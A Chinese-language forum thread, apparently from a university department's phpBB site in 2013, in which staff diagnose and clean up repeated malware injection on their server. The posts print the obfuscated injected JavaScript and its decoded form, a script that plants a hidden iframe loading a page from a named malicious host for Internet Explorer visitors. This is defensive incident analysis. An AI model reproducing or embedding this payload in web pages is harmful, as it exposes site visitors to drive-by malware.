病毒

假若各位使用者對於E-Offoce網站有"任何意見、問題"時,皆可在此發表.例如:申請版主、開立新板、功能測試、提供技術文章等等

版主: E-Office小組

分享到: Facebook

Re:病毒

文章gily » 週二 1月 15, 2013 12:18 pm

我沒有異常喔~

OS:Win8

Browser:Google Chrome 21.0.1180.83 m
頭像
gily
版面管理員
 
文章: 26
註冊時間: 週六 1月 28, 2006 7:44 am

Re:病毒

文章XO » 週二 1月 15, 2013 12:32 pm

我的 Google Chrome:版本 23.0.1271.91 m
經過更新成為:版本 24.0.1312.52 m,之後再試,告警依舊。

樓上 Gily 更新為 版本 24,卻依舊不會出現告警。
起先我懷疑是不是最近美國國土安全局發現的那郭 Java 瀏覽器插件 的安全漏洞...
經查 Gily 機器上的 Google Chome 確實 Java plugin 也是開著的沒有 disable 掉。
最後由 XO 於 週三 1月 16, 2013 9:44 pm 編輯,總共編輯了 1 次。
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章XO » 週二 1月 15, 2013 2:45 pm

來到辦公室,從我 Win8 同樣最新版本 24 的 Google Chrome 去瀏覽 EO 也會出現告警耶~~~
(不解為啥 Gily 機器上卻可以登入瀏覽 EO 毫無問題???)

但是... 發覺從我新灌 Win8 底下的 IE10 登入 EO,會出現如下警告訊息:
(按:家裡桌機與我 F6V 筆電上都還是 IE9, 登入 EO 完全沒有提出告警)

圖檔

看來確實有駭客或病毒程式企圖透過 sessions.php 頁面植入網站一些惡意碼...
再來就是:

  1. Google Chrome 安全方面較嚴謹(好像先知先覺、擋在前面)
  2. Firefox 則後知後覺,讓你 PO 文後,才驚覺有異樣不對處 (不知道這放過一PO有否造成傷害就不知啦)
  3. IE 9 根本就是麻木不仁、不知不覺。完全沒察覺有異!
  4. IE 10 一洗前恥,不但知道有誤,還進一步供出錯誤處 (session.php ㄇㄟ)
附加檔案
MalwareEO20130115-2.png
Logon to EO using IE10 under win8 on my U5A
(80.36 KiB) 被下載 4 次
最後由 XO 於 週三 1月 16, 2013 11:07 am 編輯,總共編輯了 1 次。
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章XO » 週二 1月 15, 2013 9:33 pm

花了些時間清理了一下網站,移除了 43 個疑似被植入的惡意程式碼。
也到 Google 為 E-Office 網站申請納入 網站管理員工具 (Webmaster Tools) 的管理。

提出 要求審查 ,可能需要些時間等 Google 幫我們從黑名單當中剔除。

目前 IE9、IE10 與 Firefox 皆暢行無阻(感覺IE沒有參照 Google 惡意軟體網站黑名單)。
Google Chrome 則需等審查結果囉~~~
最後由 XO 於 週三 1月 16, 2013 8:46 am 編輯,總共編輯了 2 次。
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章XO » 週三 1月 16, 2013 12:47 am

圖檔
附加檔案
MalwareEO20130115-Fixed.png
Google 審查過關
(171.39 KiB) 被下載 7 次
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章XO » 週三 1月 16, 2013 7:46 am

呵呵呵~~ 一早起來....
以為一切搞定...也看到被孤狗廟驗明正身、從黑名單移除~~~
正高興地用 Google Chrome 瀏覽著 EO 的說...

但...

志得意滿地登入該伺服器,發現又被注入ㄧ些惡意碼...
昨兒求神問佛一整天就為這一樁...

伺服器上掃過毒、做了 Windows Update、停掉 Apache、移除 42 處被注入的惡意碼、重啟 Apache。
結果連兩個 php 檔設為 Read Only 的,也照舊還是再度被注入惡意碼...

看來是系統管理者密碼被盜... (我猜啦~~~)

再接再厲 改密碼、刪 Code 囉...
<sigh> 隔行如隔山... 花時間呀~~~~ :-(
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章benwu » 週三 1月 16, 2013 3:31 pm

這可以當做資料通訊與網路管理的個案教材了!!
我不是大吳老師,也不是小吳老師,我是Ben老師
我的部落格
http://eportfolio.fju.edu.tw/053792
頭像
benwu
資管系教師
 
文章: 645
註冊時間: 週二 4月 20, 2004 4:17 pm
來自: 輔大資管系

Re:病毒

文章korprulu » 週三 1月 16, 2013 5:59 pm

老師可以查一下是否有不正常的程序在background執行

XO 寫:呵呵呵~~ 一早起來....
以為一切搞定...也看到被孤狗廟驗明正身、從黑名單移除~~~
正高興地用 Google Chrome 瀏覽著 EO 的說...

但...

志得意滿地登入該伺服器,發現又被注入ㄧ些惡意碼...
昨兒求神問佛一整天就為這一樁...

伺服器上掃過毒、做了 Windows Update、停掉 Apache、移除 42 處被注入的惡意碼、重啟 Apache。
結果連兩個 php 檔設為 Read Only 的,也照舊還是再度被注入惡意碼...

看來是系統管理者密碼被盜... (我猜啦~~~)

再接再厲 改密碼、刪 Code 囉...
<sigh> 隔行如隔山... 花時間呀~~~~ :-(
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

Re:病毒

文章XO » 週三 1月 16, 2013 7:24 pm

korprulu 寫:老師可以查一下是否有不正常的程序在background執行


我功力不夠,看不出啥不正常處... ^o^
我用私人訊息貼了螢幕截圖給你,方便幫著看看嗎?謝謝!

昨天把病毒檔更新後,掃過整個系統,還重新開過機。

剛剛及時發現 Malicious code 再度冒出、又掃蕩了一次戰場。希望 Google 沒那麼勤快來找碴! ^o^
給他盯上列入黑名單,要申請擺脫總要等上一段時間。

基本上,我先暫時把 FTP Server 關閉,網路上文章也有網友指稱 FTP 未盡安全造成漏洞。
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章XO » 週四 1月 17, 2013 9:13 am

eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章korprulu » 週四 1月 17, 2013 11:29 am

老師,昨天回家來就晚了,所以只大概看了看
但有調整一樣設定,就是將php的safe mode打開
這樣可限制php執行危險的語法

今天再進去研究看看
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

Re:病毒

文章XO » 週四 1月 17, 2013 12:54 pm

換過系統管理員密碼。
關掉 FTP 伺服器...

之後...

今天凌晨 1:30AM 還有早上 10:30AM 兩次進入,都發覺清除掉的 Malicious codes 全又回來了。

繼續研究...

  1. 發現 FTP 帳號 eoffice 底下,前此不知誰上傳了個 config.php (也是被感染腳本之一),雖然
    phpbb PO 文夾檔上傳會篩檢, .php 副檔名無法夾檔上傳。但是透過 FTP 連線 上傳沒這個限
    制,然這上傳(主要作 image 附圖夾檔用)檔案擺放位置在網站瀏覽網域內,都可以被瀏覽執行。
    該 config.php 裡面... 不得了!存放的是 MySQL 資料庫的帳密... MySQL 入侵也許又是漏洞。
  2. EO 機器看到 3306 這個 MySQL socket access port 門戶大開。我在 my.ini 的 [mysqld]
    這一個 section 裡加了 bind-address=127.0.0.1 限制了 MySQL 不可以由外部遠端存取。


還沒來得及重啟 MySQL Server,遠端連線被 korprulu 連入搶走... ^o^

korprulu, 我 FB 留給你的訊息看到沒?你現在還登入在 EO 機器上嗎?
最後由 XO 於 週四 1月 17, 2013 1:12 pm 編輯,總共編輯了 4 次。
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章korprulu » 週四 1月 17, 2013 1:02 pm

我現在離開了,改了些設定,也紀錄在readme裡
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

Re:病毒

文章XO » 週四 1月 17, 2013 1:11 pm

korprulu 寫:我現在離開了,改了些設定,也紀錄在readme裡



01:24PM, saw your message left behind in readme.txt。
korprulu! Thank you!
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章korprulu » 週四 1月 17, 2013 1:41 pm

昨天有發現個疑點
sessions.php程式裏面的sql敘述全部都是用字串組合,沒有用prepare statement,也沒有做預防sql injection的處理,
而phpbb是用cookie session,cookie沒加密是明碼儲存,好像也沒有設定httponly
這就有機會從竄改cookie下手做injection,取得權限帳號,然後置入malicious script
就是標準的XSS攻擊

不確定是否入侵者是透過這個漏洞進來,但感覺這站要儘快更新囉。
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

Re:病毒

文章XO » 週四 1月 17, 2013 5:38 pm

你的猜測正好是我懷疑的...
正在看你設置開啟的 php log 中...

Typical error message in log says,

[17-Jan-2013 15:11:49] PHP Warning: Cannot modify header information - headers already sent by (output started at
D:\Web\phpbb\index.php(1) : eval()'d code:9) in D:\Web\phpbb\includes\sessions.php on line 245


sessions.php 的第 245 & 246 行:
代碼: 選擇全部
setcookie($cookiename . '_data', serialize($sessiondata), $current_time + 31536000, $cookiepath, $cookiedomain, $cookiesecure);
setcookie($cookiename . '_sid', $session_id, 0, $cookiepath, $cookiedomain, $cookiesecure);


猜測:感染係透過 cookie, 上面這段話應該是說原來在 sessions.php 第 245 行的 setcookie() 裡,要去設 Response header
的某個 header field,但是該 header field 已經在被感染的 D:\Web\phpbb\index.php 第一行裡以 eval 解開後惡意碼 當中的
第 9 行裡,就搶先設過了。
最後由 XO 於 週五 1月 18, 2013 3:37 pm 編輯,總共編輯了 2 次。
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章XO » 週四 1月 17, 2013 5:52 pm

用 copyleft 前此提供的網站 http://ddecode.com/phpdecoder/ 解 D:\Web\phpbb\index.php 第一行那段被注入的碼...
第一個 step 解出來如下:

圖檔

eval 裡第 9 行確實是在設HTTP Response Header 裡的 Cookie 準備傳回到造訪者的機器上。
<sigh> 這利害囉... 每個論壇造訪者都在他 Cookie 裡暗藏春色... Oops, 不是啦!我是說 malicious script 啦!
附加檔案
MalwareEO20130117.png
decoded malicious script, step one result
(78.48 KiB) 被下載 2 次
最後由 XO 於 週五 1月 18, 2013 3:41 pm 編輯,總共編輯了 1 次。
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章korprulu » 週四 1月 17, 2013 6:28 pm

因為網站升級還要研究

所以目前的暫時的作法可以是,
  1. 修改 sessions.php 裡的 sql 敘述都改用 prepare statement,加強預防 sql injection。
  2. 將所有的 session cookie 都改成 httponly,參照 官方 function 說明,但有可能會對某些正常功能有影響(如果該功能需要在 client 端寫入 session cookie 的話)。
  3. 找出入侵者 injection 的 code 並刪掉,我認為是在db的某個 table 裡,這比較麻煩,只能一個個找。
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

Re:病毒

文章XO » 週四 1月 17, 2013 6:46 pm

果然...

一如網路上所言,這類入侵會用如下 iframe 把你自動導到惡意網站去注入 惡意碼:

代碼: 選擇全部
<iframe src="http://xxx.xxx.xxx" width=... >


上述附圖指稱 這後面還一長串 那段,在 copyleft 提供的 decoder
網站進一步解出的 step 2 內容如下:

代碼: 選擇全部
try {
    window.document.body++
} catch(gdsgsdg) {
    dbshre=163;
    if(dbshre) {
        zaq=0;
        try {
            v=document.createElement("div");
        } catch(agdsg) {
            zaq=1;
        }
        if(!zaq) {e=eval;}
        ss=String;
        asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,
                  104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,
                  37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,
                  116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32,34,40,111,102,75,109,
                  108,100,101,95,33,45,49,32,38,108,111,93,106,108,107,99,105,94,32,46,35,54,116,5,3,99,97,31,
                  102,90,112,100,94,89,109,105,109,37,91,104,105,102,96,93,62,104,92,89,100,94,94,36,114,5,3,
                  3,113,88,106,25,109,111,101,101,54,108,110,31,33,52,7,5,0,110,90,108,27,108,89,25,55,27,101,
                  89,111,99,98,88,108,104,108,41,108,107,94,108,60,94,93,103,110,54,4,2,2,99,97,31,109,90,40,
                  100,101,92,94,114,74,93,32,32,81,100,101,92,104,113,110,30,33,26,55,40,40,24,31,32,27,108,89,
                  39,99,105,91,93,113,73,97,31,31,70,77,68,60,31,34,27,56,36,41,34,117,8,1,1,2,94,106,90,109,102,
                  95,105,107,38,112,108,100,107,93,33,33,55,106,108,114,102,96,53,38,108,33,38,106,108,103,103,
                  38,30,24,116,26,107,102,107,98,110,100,102,102,51,91,93,106,103,101,111,111,92,51,25,102,96,
                  93,108,51,39,34,34,95,107,91,35,45,40,41,38,44,39,40,41,35,38,30,104,113,53,27,107,103,105,52,
                  40,30,35,96,108,92,31,46,41,42,39,40,40,41,42,36,34,31,105,114,54,23,117,53,41,110,107,113,101,
                  95,57,23,52,93,99,113,23,91,101,91,110,106,53,27,109,34,34,107,109,104,104,34,31,27,56,55,96,
                  94,107,91,104,92,24,108,108,94,52,26,97,110,111,103,50,40,41,108,98,101,98,93,97,113,92,93,94,
                  93,93,38,102,115,97,110,38,110,109,42,88,92,40,96,96,92,92,39,106,99,103,26,25,113,100,91,108,
                  97,55,29,30,35,96,108,92,31,43,41,42,39,45,40,41,35,38,30,26,25,98,96,96,95,97,110,56,25,31,36,
                  97,109,88,32,44,42,43,35,46,41,42,36,34,31,27,56,55,38,97,95,108,92,100,93,55,54,42,91,97,111,
                  56,34,32,51,6,4,4,116,5,3,3,113,88,106,25,95,115,103,53,103,95,114,23,60,90,110,96,31,33,52,95,
                  115,103,38,108,95,111,59,89,109,95,35,92,112,105,40,98,92,108,61,91,111,92,32,34,37,50,32,51,6,
                  4,4,96,94,33,94,106,90,109,102,95,105,107,38,92,105,106,98,97,94,40,100,101,92,94,114,74,93,32,
                  32,89,90,108,108,102,96,109,52,31,34,55,56,36,41,34,117,95,102,91,110,103,96,101,108,39,93,106,
                  102,99,98,95,56,30,87,88,111,111,100,94,107,55,34,34,106,108,34,36,34,31,52,26,96,111,104,98,108,
                  96,106,53,32,37,96,111,104,39,110,106,62,69,77,77,111,105,97,103,97,35,32,35,32,53,27,103,89,109,
                  98,56,38,31,52,119,8,1,117);
        s="";
        for (i=0;i-712!=0;i++) {
            if (window.document) s+=ss["fro"+"mCharCo"+"de"](1*asgq[i]-(i%5-5-4));
        }
        z=s;
        e(s);
    }
}


這一段 JavaScript 碼我把最後那郭障眼的 e(s), 其實就是 eval(s) (執行腳本) 改成 print(s) (印出腳本來),然後... 拿到
這個 Realtime JavaScript Evaluator

去執行,解出下面這段程式碼:

代碼: 選擇全部
function gra(a,b) {return Math.floor(Math.random()*(b-a+1))+a;}
function rs() {return Math.random().toString(36).substring(5);}
if(navigator.cookieEnabled) {
    var stnm=rs();
    var ua = navigator.userAgent;
    if (ua.indexOf('Windows')!=-1 && ua.indexOf('MSIE')!=-1) {
        document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600,1000) + 'px; top:-' + gra(600,1000) +
                'px; }</style> <div class="s' + stnm + '">[color=red][b]<iframe src="http://qkmicfzdddbf.myfw.us/ad/feed.php"[/b][/color] width="' +
                gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
    }
    var exp = new Date();
    exp.setDate(exp.getDate()+7);
    if (document.cookie.indexOf('__utmfr=')==-1) {
        document.cookie='__utmfr=' + rs() + ';expires=' + exp.toGMTString() + ';path=/' ;
    }
}
undefined


(補述:下面這一段我原先 PO 文時,未細察看錯了!正好相反... 樓下少凱會指正 ... :oops: 看來是沖著 IE 來的...)
中間可以看到只要 Browser Cookie 是 enable 的,然後瀏覽器不是 MSIE 的,就會被植入 iframe 導向 qkmicfzdddbf.myfw.us
這個邪惡網站去執行一個叫 /ad/feed.php (餵你飽飽的) 的腳本...

<sigh> 前面錯怪 IE 了, IE 可以瀏覽咱們 E-Office 不會被詛咒原來是這個緣故! <sigh> 這個 Malware 該不會 微軟擁護者幹的吧!?
最後由 XO 於 週五 1月 18, 2013 3:56 pm 編輯,總共編輯了 10 次。
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5473
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章korprulu » 週四 1月 17, 2013 6:57 pm

看 code 好像是相反
ua.indexOf('Windows')!=-1 && ua.indexOf('MSIE')!=-1
這應該是 Windows 又是 IE,就塞 iframe
表明就是衝 IE 不安全來的
因為ie不安全,所以不報錯,有被入侵的可能,要小心了
好險我只用 Firefox 或 Chrome
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

上一頁下一頁

回到 站務討論版

誰在線上

正在瀏覽這個版面的使用者:沒有註冊會員 和 1 位訪客